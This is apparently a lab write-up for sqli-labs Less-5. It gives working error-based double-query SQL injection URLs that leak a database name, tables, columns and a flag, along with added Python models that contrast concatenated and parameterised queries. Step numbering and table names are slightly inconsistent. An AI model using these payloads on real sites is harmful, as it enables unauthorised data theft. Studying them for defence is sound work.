Less-5 GET - Double Injection - Single Quotes - String (double-query GET injection, single-quoted string parameter)
1. Check whether the parameter is injectable
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1'
Error response => injectable
2. Determine the parameter type
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1 and 1=2
Normal response => string type (a numeric parameter would have evaluated and 1=2 and returned nothing)
3. Close the quote
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=2 --+
Error response
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=1 --+
Normal response => quote closed successfully
4. Find how many columns the query behind the site selects
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 3 --+
Normal response
https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 4 --+
Error response => column boundary found at 4
5. Run the double-query injection to retrieve the name of the current database
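Steps 1 to 4 work only because the id parameter is pasted into the SQL text, so the response flips between "error" and "normal" as the attacker-controlled quote, comment and ORDER BY term change the statement. The following Python script, added here as an example and not part of the original write-up or of sqli-labs, reproduces that behaviour against an in-memory SQLite table with constructed sample rows, and puts the string-concatenated query next to the parameterised one that the sqli-labs code should have used. The table name, rows and function names are assumptions; the payloads are the ones from the steps above with --+ URL-decoded to "-- ".

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the lab's users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")],
    )
    con.commit()
    return con

def lookup_vulnerable(con, user_id):
    """String concatenation: the parameter becomes part of the SQL text,
    exactly the defect the Less-5 steps exploit."""
    sql = f"SELECT username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return con.execute(sql).fetchone()

def lookup_safe(con, user_id):
    """Bound parameter: whatever id contains is compared as a value,
    never parsed as SQL, so quotes, comments and ORDER BY are inert."""
    sql = "SELECT username, password FROM users WHERE id=? LIMIT 0,1"
    return con.execute(sql, (user_id,)).fetchone()

def probe(con, lookup, payload):
    """Return ('error', message) or ('ok', row), which is the only signal
    the page's steps 1-4 rely on: does the response flip or not."""
    try:
        row = lookup(con, payload)
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", row)

if __name__ == "__main__":
    con = make_db()
    for payload in ["1'", "1' and 1=1 -- ", "1' and 1=2 -- ",
                    "1' order by 2 -- ", "1' order by 3 -- "]:
        print(f"{payload!r:22} vulnerable={probe(con, lookup_vulnerable, payload)}"
              f"  safe={probe(con, lookup_safe, payload)}")
```

With the concatenated query the probes behave just like the lab: a bare quote errors, and 1=1 / and 1=2 toggle the row, and ORDER BY errors as soon as the term exceeds the two selected columns. With the bound parameter every one of those payloads is just an id that matches nothing, so the attacker gets no oracle at all.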
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union SELECT null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+
6. List the tables in the database
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 0,1),floor(rand()*2))as a from information_schema.tables group by a --+
8. List the columns of table tG7wdqTJ
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name="RqSknMg2" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+
9. Read the data in the flag column of the table
https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select flag from RqSknMg2 limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+
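Steps 5 to 9 all use the same trick: count(*) grouped on concat(<secret>, floor(rand()*2)). MySQL builds the GROUP BY result in a temporary table keyed on that expression, and it evaluates the key once when it looks a row up and again when it inserts a new group, so a non-deterministic key can be missing at lookup time and collide at insert time. The collision raises "Duplicate entry '...' for key 'group_key'", and because the secret is part of the key it ends up in the error text, which this page then reads from the response. The Python model below is an added illustration, not part of the write-up and not MySQL's actual code; it scripts the rand() values instead of drawing them, so the outcome is reproducible, and it pairs the mechanism with the application-side control that closes the leak: never echo the database's error text to the client. Function and class names are assumptions.

```python
class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 (ER_DUP_ENTRY)."""

def group_by_count(rows, key_fn):
    """Simplified model of MySQL's temporary-table GROUP BY.

    For each row the key expression is evaluated to probe the table; if the
    group is absent it is evaluated *again* to insert it.  With a
    deterministic key both evaluations agree.  With floor(rand()*2) in the
    key the second evaluation can land on a group that already exists, which
    is the duplicate-key error the double-query payloads depend on."""
    table = {}
    for _ in rows:
        probe_key = key_fn()
        if probe_key in table:
            table[probe_key] += 1
            continue
        insert_key = key_fn()          # re-evaluated, may differ from probe_key
        if insert_key in table:
            raise DuplicateEntry(f"Duplicate entry '{insert_key}' for key 'group_key'")
        table[insert_key] = 1
    return table

def leak_via_group_by(secret, rand_values, row_count=3):
    """Run the page's count(*) ... concat(secret, floor(rand()*2)) group by a
    pattern over row_count rows, feeding scripted rand() results.
    Returns the error text the server would raise, or None if no collision."""
    values = iter(rand_values)
    key_fn = lambda: f"{secret}{next(values)}"   # concat(secret, floor(rand()*2))
    try:
        group_by_count(range(row_count), key_fn)
    except DuplicateEntry as exc:
        return str(exc)
    return None

def render_error(exc, expose_errors=False):
    """Application-side control: log the real exception, return a generic
    message.  With expose_errors=True (the lab's behaviour) the group key,
    secret included, is handed straight to the client."""
    if expose_errors:
        return str(exc)
    return "Internal error"

if __name__ == "__main__":
    # constructed rand() outcomes: alternating 1,0 collides on the second row
    leaked = leak_via_group_by("security", [1, 0, 1, 0, 1, 0])
    print("raw error:", leaked)
    print("client sees:", render_error(DuplicateEntry(leaked)))
    # constant key never collides, which is why the trick needs rand()
    print("deterministic key:", leak_via_group_by("security", [0] * 10))
```

Two consequences follow for defenders. The condition is not rare: with real rand() any table of three or more rows almost always produces the collision, so information_schema.tables is a convenient row source and nothing about the target schema matters. And the payload is harmless to a server that returns a generic error page, which is why the fix for error-based injection is both parameterised queries and not exposing database error text.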